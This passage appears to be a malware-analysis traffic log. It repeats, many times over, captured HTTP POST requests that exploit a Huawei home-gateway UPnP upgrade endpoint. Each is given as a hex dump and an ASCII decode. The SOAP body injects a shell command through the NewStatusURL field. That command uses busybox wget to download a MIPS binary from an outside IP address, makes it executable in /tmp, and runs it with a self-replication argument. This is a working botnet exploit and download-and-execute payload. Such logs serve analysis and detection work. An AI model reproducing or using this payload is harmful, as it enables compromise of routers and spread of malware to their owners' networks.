6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 